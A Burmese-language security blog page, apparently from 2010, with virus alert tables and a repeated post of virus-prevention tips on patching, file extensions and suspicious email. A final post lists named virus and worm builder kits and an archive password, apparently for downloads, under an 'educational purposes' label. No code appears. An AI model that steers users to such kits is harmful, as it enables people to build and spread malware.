The latest alerts - ဒီ Virus ေတြနဲ႔ Trojan ေတြကေတာ့ အခု သင္သံုးေနတဲ႔ current anti-virus softwareကေန delete မလုပ္ႏိုင္ေသးပါဘူး...( ဒါေၾကာင့္ anti-virus ေတြကို update လုပ္ထားဖို႔လိုပါတယ္။ တစ္ခုခ်င္းစီေပၚမွာ Click ၾကည့္ျခင္းအားျဖင့္ အေသးစိတ္အခ်က္အလက္မ်ားကို သိႏိုင္ပါတယ္)
| Latest 10 Virus Alerts | |
|---|---|
| 28 Feb | Troj/FakeAV-AXT |
| 28 Feb | Troj/FakeAV-AXU |
| 28 Feb | Mal/RedNeck-A |
| 28 Feb | Troj/BredoZp-S |
| 28 Feb | W32/Autorun-BAC |
| 28 Feb | Mal/Banker-M |
| 28 Feb | Troj/Bancos-BGU |
| 28 Feb | Troj/Banker-EWN |
| 28 Feb | Troj/FakeAV-AXR |
| 28 Feb | Troj/FakeAV-AXP |
ေအာက္မွာျပထားတဲ႔ Virus ေတြကေတာ့ ယခင္လအတြင္းမွာ ထိပ္ဆံုးေရာက္ေနတဲ႔ top 10 most common viruses ေတြပါ။ ဒီ Virus ေတြကိုလည္း သင္လက္ရွိသံုးေနတဲ႔ Anti-virus software ကေန detect လုပ္ႏိုင္ဖို႔မေသခ်ာေသးပါဘူး...
| Top 10 viruses in February 2010 | |
|---|---|
| 1 | Troj/Invo-Zip |
| 2 | W32/Netsky |
| 3 | Mal/EncPk-EI |
| 4 | Troj/Pushdo-Gen |
| 5 | Troj/Agent-HFU |
| 6 | Mal/Iframe-E |
| 7 | Troj/Mdrop-BTV |
| 8 | Troj/Mdrop-BUF |
| 9 | Troj/Agent-HFZ |
| 10 | Troj/Agent-HGT |
Virus hoax ေတြကေတာ့ စိတ္အေႏွာင့္အယွက္ျဖစ္ေစတဲ႔ Email "warnings" ေတြျဖစ္ျပီး ၄င္းတို႔က သင့္ရဲ႕ သူငယ္ခ်င္းမ်ားအားလံုးဆီကုိ အဓိပၸာယ္မရွိတဲ႔ေမးလ္ေတြပို႔ေစျပီး သူတို႔ email box ထဲမွာ ဘာမွအသံုးမ၀င္တဲ႔ Email ေပါင္းေျမာက္ျမားစြာနဲ႔ ျပည့္ႏွက္သြားေစပါတယ္
အခ်ိန္မွီကာကြယ္ႏိုင္ဖို႔အတြက္ ျပင္ဆင္ထားႏိုင္ေအာင္ ျဖစ္ပါတယ္...( ေနာက္ဆံုးသတင္းမ်ားကို အခ်ိန္မွီ update လုပ္ေပးသြားပါမယ္...)
Dec 12 Virus မ၀င္ေအာင္ ကာကြယ္ျခင္း
Virus ဖန္တီးျခင္းေတြပဲတင္ျဖစ္ခဲ႔တာမ်ားပါတယ္။ Virus ကာကြယ္ျခင္းအပိုင္းကိုေတာ့ အခုမွပဲ တင္ျဖစ္ေတာ့တယ္။ ဒီ Post မွာေတာ့ Virus ဆိုတဲ႔ ေခါင္းစဥ္ေအာက္မွာ Trojans, Worms , Searchbars , Spyware နဲ႔ အျခား Malware ပါ၀င္တယ္လို႔ မွတ္ယူရပါလိမ့္မယ္... Virus ရန္ကေန ကာကြယ္ခ်င္တယ္ ဆိုရင္ေတာ့ အခုေဖာ္ျပမယ့္ အခ်က္ေလးေတြကို အထူးသတိထား ဖို႔ေတာ့ လိုပါတယ္....
(၁) Security Patch မ်ားကို Install လုပ္ပါ။
သင့္ရဲ႕ Operating System အတြက္ available ျဖစ္ေနတဲ႔ security patch အားလံုးကို ရယူဖို႔နဲ႔ install လုပ္ထားဖုိ႔လိုပါတယ္... အကယ္၍ Windows 98 နဲ႔ ေနာက္ပိုင္း Windows ေတြမွာ MSIE နဲ႔ Windows Update ေတြအတြက္ လိုအပ္တဲ႔ Patch ေတြကို Provide ေပးေပမယ့္ Windows 95 နဲ႔ အလားတူ system ေတြအတြက္ ကေတာ့ WindizUpdate ကို အသံုးျပဳသင့္ပါတယ္...
အေရးအၾကီးဆံုးကေတာ့ အပတ္စဥ္ updates ေတြကို စစ္ေဆးေပးဖို႔နဲ႔ သင့္ရဲ႕ Operation System အတြက္ေတြ႔ရွိထားတဲ႔ အားနည္းခ်က္မ်ားနဲ႔ ပတ္သတ္တဲ႔ ေနာက္ဆံုးသတင္းအခ်က္အလက္ေတြကို ရရွိဖို႔ မ်က္စိဖြင့္ နားစြင့္ ထားရမွာ ျဖစ္ပါတယ္ ။
(၂) Antivirus Software နဲ႔ Adware Removal Tools ေတြအေပၚမွာပဲ အားကိုး အားထားမျပဳပါနဲ႔
Virus ေတြကို ကာကြယ္ဖုိ႔အတြက္ Antivirus Software ေတြ Tools ေတြကို သံုးတာဟာ ေကာင္းတဲ႔ သင့္ Computer ကိုကာကြယ္ဖုိ႔အတြက္ ေကာင္းေသာ အေလ့အက်င့္တခုပါ... ဒါေပမယ့္ အဲဒီ Software ေတြ Tools ေတြအေပၚမွာပဲ အားကိုးမေနသင့္ပါဘူး... Training နဲ႔ Virus Awareness ရွိေနဖို႔က ပိုအေရးၾကီးတာျဖစ္ပါတယ္...
သိၾကတဲ႔အတိုင္းပဲ လူအမ်ားစုက ကိုယ့္ Computer မွာ Antivirus Software ကို run ထားတယ္ဆိုရင္ Antivirus က ကာကြယ္ေပးလိမ့္မယ္ ဆိုျပီး သတိမမူေတာ့ပဲ စိတ္ခ်လက္ခ်ေနတတ္ၾကပါတယ္... အဲဒါဟာ မွားတယ္ဆိုတာကို ေအာက္ပါ အခ်က္ေတြကို ၾကည့္ျခင္းအားျဖင့္ သိပါလိမ့္မယ္....
အေရးၾကီးတာကေတာ့ Email Attachment ေတြ မဖြင့္ခင္ (သို႔) Website ( or porn site) တစ္ခုကေန Softwar ေတြကို download မလုပ္ခင္မွာ သင့္ browser ရဲ႕ disk cache ကိုဖယ္ရွားေပးဖုိ႔လိုပါတယ္... ဘာေၾကာင့္လဲဆိုေတာ့ website ေတြ႔ရဲ႕ Viruses scan အမ်ားစုဟာ Email address ရဖို႔အတြက္ သင့္ဆီကို ေရာက္လာတတ္ပါတယ္...
(၃) Internet Explorer , Mocrosoft Word ( သို႔ ) Outlook Express ေတြကို မသံုးပါနဲ႔
လူသံုးအရမ္းမ်ားတဲ႔ web browser ေတြ၊ လူသံုးမ်ားတဲ႔ word processor ( သို႔ ) Windows Adress Book ေတြကို အသံုးမျပဳသင့္ပါဘူး.. ဘာေၾကာင့္လဲဆိုေတာ့ Netsky virus ကို ဥပမာ တစ္ခုအေနနဲ႔ ၾကည့္ ၾကည့္ပါ။ ၄င္း Virus က သင့္ရဲ႕ Computer ကို Email address ေတြ ရဖို႔အတြက္ scan ေတြဖတ္ပါတယ္...ဖုိင္ အကုန္လံုးကို scan ဖတ္တာေတာ့မဟုတ္ပါဘူး.. ေအာက္ပါ ဖိုင္ types ေတြကို scan ဖတ္ပါတယ္...
ဒါေၾကာင့္ အဲဒီ documents ေတြထဲမွာ ပါ၀င္တဲ႔ email address ေတြကို ရယူျပီး Virus ကေန mail ေတြပို႔ပါတယ္... ေကာင္းတာကေတာ့ တျခား email program ေတြနဲ႔ အျခားအျခားေသာ word processor ေတြကို အသံုးျပဳသင့္ပါတယ္... Microsoft Word ကပဲ word processor အျဖစ္ Available ျဖစ္တာ မဟုတ္ပါဘူး MS ထက္ ေကာင္းတာေတြအမ်ားၾကီး ရွိပါတယ္... ဥပမာ OpenOffice ကိုလည္း MS အစားသံုးလို႔ရပါတယ္... ၄င္းက viruses scan ေတြမဖတ္ႏိုင္ေအာင္ ဖန္တီးထားပါတယ္...
ေနာက္တစ္ခုကေတာ့ Microsoft ရဲ႕ Internet Explorer ( IE ) browser ကိုလည္း အသံုးမျပဳသင့္ပါဘူး.. ဘာလို႔လဲဆိုေတာ့ IE browser ဟာ မလိုအပ္တဲ႔ features ေတြကို user မသိပဲ (သို႔) သေဘာမတူပဲ အလြယ္တကူ ထည့္ေပးႏိုင္လို႔ျဖစ္ပါတယ္.. ( ဥပမာ - search bar - Search bar ေတြကို ဘာေၾကာင့္ ကန္႔သတ္သင့္လဲဆိုေတာ့ အဲဒီ software (search bar) က သင့္ Computer မွာ သင္ရိုက္သမွ် key ေတြ၊ သင္ ၀င္ေရာက္လည္ပတ္သမွ် website ေတြ နဲ႔ သင့္ရဲ႕ Computer ကို အေ၀းကေနအျပည့္အ၀ထိန္းခ်ဳပ္ႏိုင္ဖို႔ အတြက္ အခ်က္အလက္ေတြကို Central hacker ဆီကို ပို႔ေပးဖို႔အတြက္ Adware ေတြ Trojan ေတြ အဲဒီ Search bar မွာပါ၀င္တတ္ပါတယ္....)
U.S government's Computer Emergency Rediness Team ( US-CERT) ကေန Microsoft's Internet Explorer( IE) bowser အသံုးျပဳျခင္းကို ရပ္တန္႔ဖို႔သတိေပးထားပါတယ္.. Vulnerability Note မွာၾကည့္ပါ...
(၄) File-Type ေတြကလည္းသိထားဖို႔လို႔ပါတယ္
Windows ေတြမွာပါတဲ႔ စိုးရိမ္စရာ အျပစ္တစ္ခုကေတာ့ file extension ေတြကို ဖံုးကြယ္ဖို႔ default setting ပါရွိျခင္းျဖစ္ပါတယ္... file extensions ေတြဟာ အလြန္အေရးၾကီးပါတယ္... ဘယ္ေတာ့မွ hidden မလုပ္သင့္ပါဘူး...
သင့္ရဲ႕ computer မွာရွိတဲ႔ ဖိုင္ေတြကို အလြယ္တကူ ခြဲျခားသတ္မွတ္ေပးဖို႔ နဲ႔ ရွာေဖြေတြ႔ရွိဖုိ႔အတြက္ ဖိုင္ ေတြကို ကိုယ္စားျပဳတဲ႔ icons ေတြျပဳလုပ္ထားပါတယ္... အမ်ားအားျဖင့္ေတာ့ document ရဲ႕ types အမ်ိဳးမ်ိဳးမွာ ကိုယ္ပိုင္ icon ေတြရွိၾကပါတယ္... ဥပမယ္.. Adobe Acrobat file ေတြမွာ သိသာေစတဲ႔ icon တစ္ခုရွိပါတယ္... ဒါေပမယ့္ အဲဒီ icon ထဲမွာ ပါ၀င္တဲ႔ Windows Executable file (.exe) ကို သတိထားမိခ်င္မွ ထားမိပါလိမ့္မယ္...ဒါ့အျပင္ တျခား document ေတြနဲ႔ ဆင္တူေနတာေတြလည္း ရွိနိုင္ပါတယ္... ဒါေၾကာင့္ file types ကို ေတြကို သိထားဖို႔အေရးၾကီးပါတယ္...
Extensions ေတြကို ေဖာ္ျပေပးထားပါတယ္...အဲဒီ extensions ေတြပါ၀င္တဲ႔ ဘယ္attachment မဆို virus လို႔ယူဆႏိုင္ပါတယ္...
ဒါအျပင္လည္း .EXE file အေနနဲ႔လည္း ရွိပါတယ္... ဒါေပမယ့္ virus မဟုတ္တဲ႔ executable files ေတြလည္း ရွိေနေတာ့ သတိေတာ့ထားဖို႔လိုပါတယ္...အကယ္၍ email ေတြကေနပို႔တဲ႔အခါ ကိုယ္ယံုၾကည္စိတ္ခ်မႈမရွိဘူး ဆိုရင္ မဖြင့္ပါနဲ႔...
ျပီးေတာ့ ဘယ္ OLE document ( OLE document ေတြမွာ Word and Excel documents ေတြပါ၀င္ပါတယ္ ) မဆို viruses ပါ၀င္ႏိုင္တယ္ဆိုတာ မေမ့ပါနဲ႔...
ေနာက္သတိထားရမယ့္ extension တစ္ခုကေတာ့ .ZIP ပါ။ အဲဒီထဲမွာ compressed files ေတြပါ၀င္ပါတယ္... ZIP file ေတြက သူတို႔ထဲမွာ ပါတဲ႔ file ရဲ႕ extensions ေတြကို ဖံုးကြယ္ေပးဖို႔ အသံုး၀င္ေနဆဲျဖစ္ပါတယ္... ဒါေပမယ့္လည္း ZIP လုပ္ထားတဲ႔ Viruses ေတြရဲ႕ file names ေတြမွာ အမွန္တကယ္ဖိုင္ရဲ႕ extension ကို မသိႏိုင္ဖို႔အတြက္ spaces hoping အမ်ားၾကီးရွိတတ္ပါတယ္။ ( ဆိုလိုတာကေတာ့ file name မွာ ("...") ပါ၀င္တာကို ေျပာတာျဖစ္ပါတယ္...)
(၅) E-Mail ဖြင့္ၾကည့္ရင္ သတိထားပါ
ကိုယ္နဲ႔ မသိတဲ႔သူေတြဆီက mail ေတြကို ဖြင့္မဖတ္မိေအာင္ သတိထားဖို႔လြယ္ေပမယ့္ တခါတရံ ကိုယ္နဲ႔ သိတဲ႔သူေတြဆီက virus ပါတဲ႔ mail ေတြကို သတိမျပဳပဲဖြင့္တတ္ၾကပါတယ္... ေအာက္မွာျပထားတဲ႔ အခ်က္ (၄) ခ်က္ေၾကာင့္ သင္နဲ႔ သိတဲ႔သူေတြရဲ႕ နာမည္နဲ႔ viurs ပါတဲ႔ Mail ေတြေရာက္လာႏိုင္ပါတယ္....
သူတို႔ရဲ႕ Computer မွာ ရွိတဲ႔ Software ေတြကေန သူတို႔မသိလိုက္ခင္မွာ သူတို႔ ကိုယ္စား email ေတြပို႔ႏိုင္ပါတယ္။
Software ေတြက တျခားတစ္ေယာက္ဆီကေန သူတို႔ရဲ႕ E-mail address ေတြကို ယူျပီး ပို႔လိုက္တာလည္း ျဖစ္ႏိုင္ပါတယ္။
ေနာက္တခုကေတာ့ သူတို႔ကိုယ္တိုင္ အမွန္တကယ္ ေပးပို႔လိုက္တဲ႔ E-mail ေတြပဲျဖစ္ပါတယ္။
ျပီးေတာ့ spammer ေတြက သင္ E-mail ဖြင့္ဖတ္ျဖစ္ေအာင္ သူတို႔ရဲ႕ နာမည္ေတြကို ေရြးခ်ယ္ျပီး ပို႔လိုက္တာလည္း ျဖစ္နိုင္ပါတယ္။
ဒါေၾကာင့္ တျခားသူတစ္ေယာက္ကေန E-mail ကို attachment နဲ႔ လိုက္တဲ႔အခါ attachment နဲ႔အတူပါလာတဲ႔ E-mail ရဲ႕ body ကို သတိထားၾကည့္ဖို႔လိုက္ပါတယ္...
ေနာက္ျပီး Message headers ကိုလည္း သတိထားရပါမယ္... ဒါေပမယ့္ တခါတရံမွာေတာ့ information အတုအေယာင္ေတြလည္း ျဖစ္ေနတတ္ပါတယ္ ... အမ်ားအားျဖင့္ေတာ့ delivery route ေတြက ယံုၾကည္စိတ္ခ်ႏိုင္ပါတယ္...။
( အခါအခြင့္သင့္လွ်င္ ဆက္လက္ေဖာ္ျပပါမည္။ )
(၁) Security Patch မ်ားကို Install လုပ္ပါ။
သင့္ရဲ႕ Operating System အတြက္ available ျဖစ္ေနတဲ႔ security patch အားလံုးကို ရယူဖို႔နဲ႔ install လုပ္ထားဖုိ႔လိုပါတယ္... အကယ္၍ Windows 98 နဲ႔ ေနာက္ပိုင္း Windows ေတြမွာ MSIE နဲ႔ Windows Update ေတြအတြက္ လိုအပ္တဲ႔ Patch ေတြကို Provide ေပးေပမယ့္ Windows 95 နဲ႔ အလားတူ system ေတြအတြက္ ကေတာ့ WindizUpdate ကို အသံုးျပဳသင့္ပါတယ္...
အေရးအၾကီးဆံုးကေတာ့ အပတ္စဥ္ updates ေတြကို စစ္ေဆးေပးဖို႔နဲ႔ သင့္ရဲ႕ Operation System အတြက္ေတြ႔ရွိထားတဲ႔ အားနည္းခ်က္မ်ားနဲ႔ ပတ္သတ္တဲ႔ ေနာက္ဆံုးသတင္းအခ်က္အလက္ေတြကို ရရွိဖို႔ မ်က္စိဖြင့္ နားစြင့္ ထားရမွာ ျဖစ္ပါတယ္ ။
(၂) Antivirus Software နဲ႔ Adware Removal Tools ေတြအေပၚမွာပဲ အားကိုး အားထားမျပဳပါနဲ႔
Virus ေတြကို ကာကြယ္ဖုိ႔အတြက္ Antivirus Software ေတြ Tools ေတြကို သံုးတာဟာ ေကာင္းတဲ႔ သင့္ Computer ကိုကာကြယ္ဖုိ႔အတြက္ ေကာင္းေသာ အေလ့အက်င့္တခုပါ... ဒါေပမယ့္ အဲဒီ Software ေတြ Tools ေတြအေပၚမွာပဲ အားကိုးမေနသင့္ပါဘူး... Training နဲ႔ Virus Awareness ရွိေနဖို႔က ပိုအေရးၾကီးတာျဖစ္ပါတယ္...
သိၾကတဲ႔အတိုင္းပဲ လူအမ်ားစုက ကိုယ့္ Computer မွာ Antivirus Software ကို run ထားတယ္ဆိုရင္ Antivirus က ကာကြယ္ေပးလိမ့္မယ္ ဆိုျပီး သတိမမူေတာ့ပဲ စိတ္ခ်လက္ခ်ေနတတ္ၾကပါတယ္... အဲဒါဟာ မွားတယ္ဆိုတာကို ေအာက္ပါ အခ်က္ေတြကို ၾကည့္ျခင္းအားျဖင့္ သိပါလိမ့္မယ္....
- အကယ္၍ သင့္ Antivirus ရဲ႕ virus definition ေတြဟာ ရက္သတၱပတ္ ၂ ပတ္ေက်ာ္သြားျပီး ဆိုရင္ သင့္ရဲ႕ Virus Scanner ဟာ အသံုးမ၀င္ေတာ့ပါဘူး... ဘာေၾကာင့္လဲဆိုေတာ့ အသစ္ထြက္တဲ႔ Virus ေတြကို detected မျဖစ္ပဲ ၀င္ခြင့္ျပဳေနေသးလို႔ျဖစ္ပါတယ္...သင့္ရဲ႕ ဖိုင္ေတြကို remove လုပ္ဖုိ႔၊ exit လုပ္ဖို႔နဲ႔ emails အေျမာက္အျမားပို႔ဖို႔ အတြက္ အလားအလာေတြ ရွိေနပါေသးတယ္... free antivirus program ေတြမွာဆိုရင္ အမ်ားအားျဖင့္ တစ္လ တခါပဲ update ေပးပါတယ္... အဲလိုမ်ိဳး software ေတြကို ဘယ္ေတာ့မွ မသံုးမျပဳသင့္ပါဘူ...
- ေနာက္တစ္ခုက အသစ္ထြက္လာတဲ႔ Virus ေတြျပန္႔ႏွံ႔ေနတဲ႔ အခ်ိန္နဲ႔ အဲဒီ Virus ေတြရဲ႕ Virus definition ေတြကို update ေပးတဲ႔ အခ်ိန္ ( ဆိုလိုတာကေတာ့ updae ကို သင္ရရွိတဲ႔အခ်ိန္ ) ဟာ အျမဲလိုလုိပဲ နာရီေပါင္းမ်ားစြာ ကြာျခားေနတတ္ပါတယ္... အကယ္၍ သင့္ရဲ႕ ISP ( Internet Service Provider ) က email ေတြကို filter လုပ္ေပးတယ္ဆိုရင္ေတာင္ Virus အသစ္ေတြကိုေတာ့ သင္ရရွိေနအံုးမွာပဲ ျဖစ္ပါတယ္..
- Virus ေတြဟာ တစ္ခါတရံမွာ သင့္ရဲ႕ Antivirus Software ကို disable လုပ္ႏိုင္ၾကပါတယ္... Popular ျဖစ္ေနတဲ႔ Antivirus Program ေတြကို သံုးမယ္ဆိုရင္ Virus ေတြက အဲဒီ Program ကို သိျပီး terminate လုပ္ပါလိမ့္မယ္...
အေရးၾကီးတာကေတာ့ Email Attachment ေတြ မဖြင့္ခင္ (သို႔) Website ( or porn site) တစ္ခုကေန Softwar ေတြကို download မလုပ္ခင္မွာ သင့္ browser ရဲ႕ disk cache ကိုဖယ္ရွားေပးဖုိ႔လိုပါတယ္... ဘာေၾကာင့္လဲဆိုေတာ့ website ေတြ႔ရဲ႕ Viruses scan အမ်ားစုဟာ Email address ရဖို႔အတြက္ သင့္ဆီကို ေရာက္လာတတ္ပါတယ္...
(၃) Internet Explorer , Mocrosoft Word ( သို႔ ) Outlook Express ေတြကို မသံုးပါနဲ႔
လူသံုးအရမ္းမ်ားတဲ႔ web browser ေတြ၊ လူသံုးမ်ားတဲ႔ word processor ( သို႔ ) Windows Adress Book ေတြကို အသံုးမျပဳသင့္ပါဘူး.. ဘာေၾကာင့္လဲဆိုေတာ့ Netsky virus ကို ဥပမာ တစ္ခုအေနနဲ႔ ၾကည့္ ၾကည့္ပါ။ ၄င္း Virus က သင့္ရဲ႕ Computer ကို Email address ေတြ ရဖို႔အတြက္ scan ေတြဖတ္ပါတယ္...ဖုိင္ အကုန္လံုးကို scan ဖတ္တာေတာ့မဟုတ္ပါဘူး.. ေအာက္ပါ ဖိုင္ types ေတြကို scan ဖတ္ပါတယ္...
.OFT ----- Outlook item template
.DOC ----- Microsoft Word Document
.EMl ----- Outlook Express email message
.WAB ----- Windows Adress Book
.DBX ----- Outlook Express email folder
.RTF ----- Rich Text formet
.TXT ----- Plain Text
ဒါေၾကာင့္ အဲဒီ documents ေတြထဲမွာ ပါ၀င္တဲ႔ email address ေတြကို ရယူျပီး Virus ကေန mail ေတြပို႔ပါတယ္... ေကာင္းတာကေတာ့ တျခား email program ေတြနဲ႔ အျခားအျခားေသာ word processor ေတြကို အသံုးျပဳသင့္ပါတယ္... Microsoft Word ကပဲ word processor အျဖစ္ Available ျဖစ္တာ မဟုတ္ပါဘူး MS ထက္ ေကာင္းတာေတြအမ်ားၾကီး ရွိပါတယ္... ဥပမာ OpenOffice ကိုလည္း MS အစားသံုးလို႔ရပါတယ္... ၄င္းက viruses scan ေတြမဖတ္ႏိုင္ေအာင္ ဖန္တီးထားပါတယ္...
ေနာက္တစ္ခုကေတာ့ Microsoft ရဲ႕ Internet Explorer ( IE ) browser ကိုလည္း အသံုးမျပဳသင့္ပါဘူး.. ဘာလို႔လဲဆိုေတာ့ IE browser ဟာ မလိုအပ္တဲ႔ features ေတြကို user မသိပဲ (သို႔) သေဘာမတူပဲ အလြယ္တကူ ထည့္ေပးႏိုင္လို႔ျဖစ္ပါတယ္.. ( ဥပမာ - search bar - Search bar ေတြကို ဘာေၾကာင့္ ကန္႔သတ္သင့္လဲဆိုေတာ့ အဲဒီ software (search bar) က သင့္ Computer မွာ သင္ရိုက္သမွ် key ေတြ၊ သင္ ၀င္ေရာက္လည္ပတ္သမွ် website ေတြ နဲ႔ သင့္ရဲ႕ Computer ကို အေ၀းကေနအျပည့္အ၀ထိန္းခ်ဳပ္ႏိုင္ဖို႔ အတြက္ အခ်က္အလက္ေတြကို Central hacker ဆီကို ပို႔ေပးဖို႔အတြက္ Adware ေတြ Trojan ေတြ အဲဒီ Search bar မွာပါ၀င္တတ္ပါတယ္....)
U.S government's Computer Emergency Rediness Team ( US-CERT) ကေန Microsoft's Internet Explorer( IE) bowser အသံုးျပဳျခင္းကို ရပ္တန္႔ဖို႔သတိေပးထားပါတယ္.. Vulnerability Note မွာၾကည့္ပါ...
(၄) File-Type ေတြကလည္းသိထားဖို႔လို႔ပါတယ္
Windows ေတြမွာပါတဲ႔ စိုးရိမ္စရာ အျပစ္တစ္ခုကေတာ့ file extension ေတြကို ဖံုးကြယ္ဖို႔ default setting ပါရွိျခင္းျဖစ္ပါတယ္... file extensions ေတြဟာ အလြန္အေရးၾကီးပါတယ္... ဘယ္ေတာ့မွ hidden မလုပ္သင့္ပါဘူး...
သင့္ရဲ႕ computer မွာရွိတဲ႔ ဖိုင္ေတြကို အလြယ္တကူ ခြဲျခားသတ္မွတ္ေပးဖို႔ နဲ႔ ရွာေဖြေတြ႔ရွိဖုိ႔အတြက္ ဖိုင္ ေတြကို ကိုယ္စားျပဳတဲ႔ icons ေတြျပဳလုပ္ထားပါတယ္... အမ်ားအားျဖင့္ေတာ့ document ရဲ႕ types အမ်ိဳးမ်ိဳးမွာ ကိုယ္ပိုင္ icon ေတြရွိၾကပါတယ္... ဥပမယ္.. Adobe Acrobat file ေတြမွာ သိသာေစတဲ႔ icon တစ္ခုရွိပါတယ္... ဒါေပမယ့္ အဲဒီ icon ထဲမွာ ပါ၀င္တဲ႔ Windows Executable file (.exe) ကို သတိထားမိခ်င္မွ ထားမိပါလိမ့္မယ္...ဒါ့အျပင္ တျခား document ေတြနဲ႔ ဆင္တူေနတာေတြလည္း ရွိနိုင္ပါတယ္... ဒါေၾကာင့္ file types ကို ေတြကို သိထားဖို႔အေရးၾကီးပါတယ္...
Extensions ေတြကို ေဖာ္ျပေပးထားပါတယ္...အဲဒီ extensions ေတြပါ၀င္တဲ႔ ဘယ္attachment မဆို virus လို႔ယူဆႏိုင္ပါတယ္...
.BAT ----- DOS batch file
.COM ----- DOS executable file
.CMD ----- Windows 2000 batch file
.CPL ----- Control Panel extension
.HTA ----- HTML application
.JS ----- JScript
.JSE ----- JScript Encoded Script
.LNK ----- Shortcut
.MSI ----- Microsoft installer database
.PIF ----- Shortcut to DOS program
.REG ----- Registary Entries
.SCF ----- Windows Explorer command
.SCR ----- Screen Saver
.VB ----- VB Script
.VBE ----- VB Encoded Script
.VBS ----- VB Script
.WS ----- Windows Script Host
.WSC ----- Windows Script Host - Componet
.WSF ----- Windows Script Host
.WSH ----- Windows Script Host - Setting file
ဒါအျပင္လည္း .EXE file အေနနဲ႔လည္း ရွိပါတယ္... ဒါေပမယ့္ virus မဟုတ္တဲ႔ executable files ေတြလည္း ရွိေနေတာ့ သတိေတာ့ထားဖို႔လိုပါတယ္...အကယ္၍ email ေတြကေနပို႔တဲ႔အခါ ကိုယ္ယံုၾကည္စိတ္ခ်မႈမရွိဘူး ဆိုရင္ မဖြင့္ပါနဲ႔...
ျပီးေတာ့ ဘယ္ OLE document ( OLE document ေတြမွာ Word and Excel documents ေတြပါ၀င္ပါတယ္ ) မဆို viruses ပါ၀င္ႏိုင္တယ္ဆိုတာ မေမ့ပါနဲ႔...
ေနာက္သတိထားရမယ့္ extension တစ္ခုကေတာ့ .ZIP ပါ။ အဲဒီထဲမွာ compressed files ေတြပါ၀င္ပါတယ္... ZIP file ေတြက သူတို႔ထဲမွာ ပါတဲ႔ file ရဲ႕ extensions ေတြကို ဖံုးကြယ္ေပးဖို႔ အသံုး၀င္ေနဆဲျဖစ္ပါတယ္... ဒါေပမယ့္လည္း ZIP လုပ္ထားတဲ႔ Viruses ေတြရဲ႕ file names ေတြမွာ အမွန္တကယ္ဖိုင္ရဲ႕ extension ကို မသိႏိုင္ဖို႔အတြက္ spaces hoping အမ်ားၾကီးရွိတတ္ပါတယ္။ ( ဆိုလိုတာကေတာ့ file name မွာ ("...") ပါ၀င္တာကို ေျပာတာျဖစ္ပါတယ္...)
(၅) E-Mail ဖြင့္ၾကည့္ရင္ သတိထားပါ
ကိုယ္နဲ႔ မသိတဲ႔သူေတြဆီက mail ေတြကို ဖြင့္မဖတ္မိေအာင္ သတိထားဖို႔လြယ္ေပမယ့္ တခါတရံ ကိုယ္နဲ႔ သိတဲ႔သူေတြဆီက virus ပါတဲ႔ mail ေတြကို သတိမျပဳပဲဖြင့္တတ္ၾကပါတယ္... ေအာက္မွာျပထားတဲ႔ အခ်က္ (၄) ခ်က္ေၾကာင့္ သင္နဲ႔ သိတဲ႔သူေတြရဲ႕ နာမည္နဲ႔ viurs ပါတဲ႔ Mail ေတြေရာက္လာႏိုင္ပါတယ္....
သူတို႔ရဲ႕ Computer မွာ ရွိတဲ႔ Software ေတြကေန သူတို႔မသိလိုက္ခင္မွာ သူတို႔ ကိုယ္စား email ေတြပို႔ႏိုင္ပါတယ္။
Software ေတြက တျခားတစ္ေယာက္ဆီကေန သူတို႔ရဲ႕ E-mail address ေတြကို ယူျပီး ပို႔လိုက္တာလည္း ျဖစ္ႏိုင္ပါတယ္။
ေနာက္တခုကေတာ့ သူတို႔ကိုယ္တိုင္ အမွန္တကယ္ ေပးပို႔လိုက္တဲ႔ E-mail ေတြပဲျဖစ္ပါတယ္။
ျပီးေတာ့ spammer ေတြက သင္ E-mail ဖြင့္ဖတ္ျဖစ္ေအာင္ သူတို႔ရဲ႕ နာမည္ေတြကို ေရြးခ်ယ္ျပီး ပို႔လိုက္တာလည္း ျဖစ္နိုင္ပါတယ္။
ဒါေၾကာင့္ တျခားသူတစ္ေယာက္ကေန E-mail ကို attachment နဲ႔ လိုက္တဲ႔အခါ attachment နဲ႔အတူပါလာတဲ႔ E-mail ရဲ႕ body ကို သတိထားၾကည့္ဖို႔လိုက္ပါတယ္...
ေနာက္ျပီး Message headers ကိုလည္း သတိထားရပါမယ္... ဒါေပမယ့္ တခါတရံမွာေတာ့ information အတုအေယာင္ေတြလည္း ျဖစ္ေနတတ္ပါတယ္ ... အမ်ားအားျဖင့္ေတာ့ delivery route ေတြက ယံုၾကည္စိတ္ခ်ႏိုင္ပါတယ္...။
( အခါအခြင့္သင့္လွ်င္ ဆက္လက္ေဖာ္ျပပါမည္။ )
Dec 22 Virus making Tool မ်ား
ဒီ post ကိုတင္သင့္ မတင္သင့္ စဥ္းစားေနရင္းနဲ႔ပဲ တင္ေပးလိုက္ပါတယ္။ ရည္ရြယ္ခ်က္ကေတာ့ Virus ေတြကို ဒီလို Tool ေတြအသံုးျပဳျပီးေတာ့လည္း လုပ္ေနၾကတယ္ဆိုတာရယ္...ေလ့လာေနသူမ်ားအေနနဲ႔ ျပည့္ျပည့္စံုစံု သိသြားေစခ်င္တဲ႔ ေစတနာပါ...။ မည္သူတစ္ဦးတစ္ေယာက္ကိုမွ ထိခုိက္ေစလိုတဲ႔ ရည္ရြယ္ခ်က္မပါ ပါဘူး။
Internet Worm Maker Thing v4


JPS Virus Maker 3.0
ပံုမွာ ၾကည့္လုိက္တာနဲ႔ ဒီ Tool နဲ႔ virus လုပ္ရတာ ဘယ္ေလာက္လြယ္တယ္ဆိုတာကို သိႏိုင္ပါတယ္...။

PASSWORD : LoloUOwnRisk
Atomic Virus Creator V.65
ဒါလည္း Virus ဖန္တီးတဲ႔ Tool တစ္ခုျဖစ္ပါတယ္။ အလြန္ Professional က်တဲ႔ Virus ေတြကို ဖန္တီးႏိုင္တဲ႔ Tool တစ္ခုျဖစ္ပါတယ္...။ ဒါအျပင္ မေကာင္းတဲ႔ hacker မ်ားတြက္လည္း အလြန္ အက်ိဳးသက္ေရာက္မႈ ရွိေစတဲ႔ Virus Creator တစ္ခုပါ။


Next Generation Virus Creation Kit 0.45 Beta


( Educational Purposes Only)
Internet Worm Maker Thing v4
JPS Virus Maker 3.0
PASSWORD : LoloUOwnRisk
Atomic Virus Creator V.65
